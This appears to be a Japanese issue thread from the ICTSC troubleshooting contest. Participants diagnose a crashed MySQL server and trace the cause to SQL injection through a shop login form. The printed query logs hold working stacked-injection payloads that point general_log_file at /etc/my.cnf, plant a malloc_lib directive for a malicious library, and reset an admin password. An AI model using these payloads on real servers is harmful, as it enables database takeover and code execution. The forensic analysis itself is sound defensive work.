bgpat
commented
7 years ago mysql死んでる
● mysql.service loaded failed failed LSB: start and stop MySQLClosed bgpat closed 7 years ago
bgpat
commented
7 years ago mysql死んでる
● mysql.service loaded failed failed LSB: start and stop MySQL
ugwis
commented
7 years ago bash-4.2# service --status-all
ERROR! MySQL is not running, but lock exists
netconsole モジュールは読み込まれていません。
設定されたデバイス:
lo eth0
現在活動中のデバイス:
lo eth0mysqlが起動しない
bash-4.2# /etc/init.d/mysql start
Starting MySQL...... ERROR! Manager of pid-file quit without updating file./etc/mysql/my.cnf
[mysqld]
general_log=1
general_log_file=/tmp/query.log
/usr/sbin/mysqld, Version: 5.1.72-community-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306 Unix socket: /var/lib/mysql/mysql.sock
Time Id Command Argument
170222 16:45:48 2 Query set global general_log = on
170222 16:45:55 2 Query select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
'
170222 16:46:00 2 Query set global general_log = offなんかsqlインジェクションか何かでmy.cnfを書き換えた?っぽい感じ
ugwis
commented
7 years ago クエリログがあった
bash-4.2# cat /tmp/query.log
170222 16:52:17 4 Connect root@localhost on
4 Init DB ictsc
4 Init DB ictsc
4 Query SHOW TABLE STATUS LIKE 'dtb_session'
4 Init DB ictsc
4 Query SELECT page_id ,page_name ,url ,php_dir ,tpl_dir ,filename ,header_chk ,footer_chk ,edit_flg ,author ,description ,keyword ,update_url ,create_date ,update_date FROM dtb_pagelayout WHERE url = 'index.php' ORDER BY page_id
4 Init DB ictsc
4 Query SELECT target_id ,(SELECT bloc_name FROM dtb_bloc AS bloc WHERE bloc.bloc_id = pos.bloc_id) AS bloc_name ,(SELECT tpl_path FROM dtb_bloc AS bloc WHERE bloc.bloc_id = pos.bloc_id) AS tpl_path ,(SELECT php_path FROM dtb_bloc AS bloc WHERE bloc.bloc_id = pos.bloc_id) AS php_path FROM dtb_blocposition AS pos WHERE page_id = (SELECT page_id FROM dtb_pagelayout WHERE url = 'index.php') ORDER BY target_id,bloc_row
4 Init DB ictsc
4 Query SELECT * FROM dtb_baseinfo
4 Init DB ictsc
4 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
4 Init DB ictsc
4 Query SELECT * FROM dtb_baseinfo
4 Init DB ictsc
4 Query SELECT * FROM dtb_category left join dtb_category_total_count using (category_id) WHERE del_flg = 0 AND product_count > 0 ORDER BY rank DESC
4 Init DB ictsc
4 Query SELECT parent_category_id,category_id FROM dtb_category
4 Init DB ictsc
4 Query SELECT *, cast(substring(news_date,1,10) as date) as news_date_disp FROM dtb_news WHERE del_flg = '0' ORDER BY rank DESC
4 Init DB ictsc
4 Query SELECT * FROM dtb_baseinfo
4 Init DB ictsc
4 Query SELECT A.*, name, price02_min, price01_min, main_list_image FROM dtb_best_products AS A INNER JOIN
(SELECT
product_id,
product_code_min,
product_code_max,
price01_min,
price01_max,
price02_min,
price02_max,
stock_min,
stock_max,
stock_unlimited_min,
stock_unlimited_max,
del_flg,
status,
name,
comment1,
comment2,
comment3,
rank,
main_list_comment,
main_image,
main_list_image,
product_flag,
deliv_date_id,
sale_limit,
point_rate,
sale_unlimited,
create_date,
deliv_fee
,(SELECT rank AS category_rank FROM dtb_category AS T4 WHERE T1.category_id = T4.category_id) as category_rank
,(SELECT category_id AS sub_category_id FROM dtb_category T4 WHERE T1.category_id = T4.category_id) as category_id
FROM
dtb_products AS T1 RIGHT JOIN (SELECT product_id AS product_id_sub, MIN(product_code) AS product_code_min, MAX(product_code) AS product_code_max, MIN(price01) AS price01_min, MAX(price01) AS price01_max, MIN(price02) AS price02_min, MAX(price02) AS price02_max, MIN(stock) AS stock_min, MAX(stock) AS stock_max, MIN(stock_unlimited) AS stock_unlimited_min, MAX(stock_unlimited) AS stock_unlimited_max FROM dtb_products_class GROUP BY product_id) AS T2 ON T1.product_id = T2.product_id_sub
) AS allcls using(product_id) WHERE status = 1 ORDER BY rank
4 Init DB ictsc
4 Query SELECT T1.category_id, category_name, level FROM dtb_category AS T1 LEFT JOIN dtb_category_total_count AS T2 ON T1.category_id = T2.category_id WHERE del_flg = 0 AND product_count > 0 ORDER BY rank DESC
4 Init DB ictsc
4 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
4 Init DB ictsc
4 Init DB ictsc
4 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
4 Init DB ictsc
4 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:10:\"/index.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
4 Quit
170222 16:52:18 5 Connect root@localhost on
5 Init DB ictsc
5 Init DB ictsc
5 Query SHOW TABLE STATUS LIKE 'dtb_session'
5 Init DB ictsc
5 Query SELECT * FROM dtb_baseinfo
5 Init DB ictsc
5 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
5 Init DB ictsc
5 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
5 Init DB ictsc
5 Init DB ictsc
5 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
5 Init DB ictsc
5 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:17:\"/mypage/login.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
5 Quit
170222 16:53:19 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; set global general_log_file = '/etc/my.cnf' --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_customer WHERE email = ''; set global general_log_file = '/etc/my.cnf' --' AND status = 1 AND del_flg = 0
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Quit
170222 16:53:20 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; set global general_log = on --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_customer WHERE email = ''; set global general_log = on --' AND status = 1 AND del_flg = 0
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Quit
170222 16:53:21 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
' --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_customer WHERE email = ''; select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
' --' AND status = 1 AND del_flg = 0
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Quit
170222 16:53:22 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; set global general_log = off --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_customer WHERE email = ''; set global general_log = off --' AND status = 1 AND del_flg = 0
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Quit
170222 16:53:23 6 Connect root@localhost on
6 Init DB ictsc
6 Init DB ictsc
6 Query SHOW TABLE STATUS LIKE 'dtb_session'
6 Init DB ictsc
6 Query SELECT sess_data FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query SELECT * FROM dtb_customer WHERE email LIKE BINARY ''; update `ictsc`.`dtb_member` SET `password` = '1234' WHERE `dtb_member`.`member_id` = 2 --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT * COUNT(*) FROM dtb_customer WHERE email ''; update `ictsc`.`dtb_member` SET `password` = '1234' --' WHERE `dtb_member`.`member_id` = 2 --' AND del_flg = 0 AND status = 2
6 Init DB ictsc
6 Query SELECT * FROM dtb_baseinfo
6 Init DB ictsc
6 Query SELECT sub_data FROM dtb_module WHERE module_id = 1
6 Init DB ictsc
6 Init DB ictsc
6 Query SELECT COUNT(*) FROM dtb_session WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'
6 Init DB ictsc
6 Query UPDATE dtb_session SET sess_data= 'cart|a:1:{s:8:\"prev_url\";s:23:\"/mypage/login_check.php\";}',update_date= Now() WHERE sess_id = 'tllufutuoa5rrtsnecou6aed87'153.23.98.1 - - [27/Feb/2017:05:12:38 +0900] "POST /mypage/login_check.php HTTP/1.1" 200 8202 "http://10.1.19.3/mypage/login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87
Safari/537.36"root pts/2 172.31.0.44 Wed Feb 22 16:45 - 16:49 (00:03)
ugwis
commented
7 years ago 該当のサーバーにアクセスし、mysqlを再起動しようとすると、次のエラーが発生した。
● mysql.service loaded failed failed LSB: start and stop MySQLbash-4.2# /etc/init.d/mysql start
Starting MySQL...... ERROR! Manager of pid-file quit without updating file.mysqlの設定ファイル/etc/mysql/my.cnfを開くと、設定ファイルが書き換えられていることが分かった。
[mysqld]
general_log=1
general_log_file=/tmp/query.log
/usr/sbin/mysqld, Version: 5.1.72-community-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306 Unix socket: /var/lib/mysql/mysql.sock
Time Id Command Argument
170222 16:45:48 2 Query set global general_log = on
170222 16:45:55 2 Query select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
'
170222 16:46:00 2 Query set global general_log = offgeneral_log_file以下をコメントアウトし、mysqlが起動出来るようになった。ECサイトも表示することが出来た。
クエリログと、httpdのログより、ECサイトのログインフォームからSQLインジェクションが行われていた。 set global general_log_file = '/etc/my.cnfで、sqlのログがmy.cnfに出力されるようになっていた。 mysqlがrootで起動しているため、
攻撃元のIPアドレスは153.129.14.1と153.23.98.1であった。
ugwis
commented
7 years ago 該当のサーバーにアクセスし、mysqlを再起動しようとすると、次のエラーが発生した。
● mysql.service loaded failed failed LSB: start and stop MySQLbash-4.2# /etc/init.d/mysql start
Starting MySQL...... ERROR! Manager of pid-file quit without updating file.mysqlの設定ファイル/etc/mysql/my.cnfを開くと、設定ファイルが書き換えられていることが分かった。
[mysqld]
general_log=1
general_log_file=/tmp/query.log
/usr/sbin/mysqld, Version: 5.1.72-community-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306 Unix socket: /var/lib/mysql/mysql.sock
Time Id Command Argument
170222 16:45:48 2 Query set global general_log = on
170222 16:45:55 2 Query select '
[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so
[separator]
'
170222 16:46:00 2 Query set global general_log = offgeneral_log_file以下をコメントアウトし、mysqlが起動出来るようになった。ECサイトも表示することが出来た。
クエリログと、httpdのログより、ECサイトのログインフォームからSQLインジェクションが行われていた。 ''' set global general_log_file = /etc/my.cnf
lastコマンドで調べたときに同じ時間でrootにログインしていたユーザーがいたため、これが攻撃者だと思われる。root pts/2 172.31.0.44 Wed Feb 22 16:45 - 16:49 (00:03)
攻撃元のIPアドレスは172.31.0.44であった。
http://contest.ictsc/#/problems/10/8/issues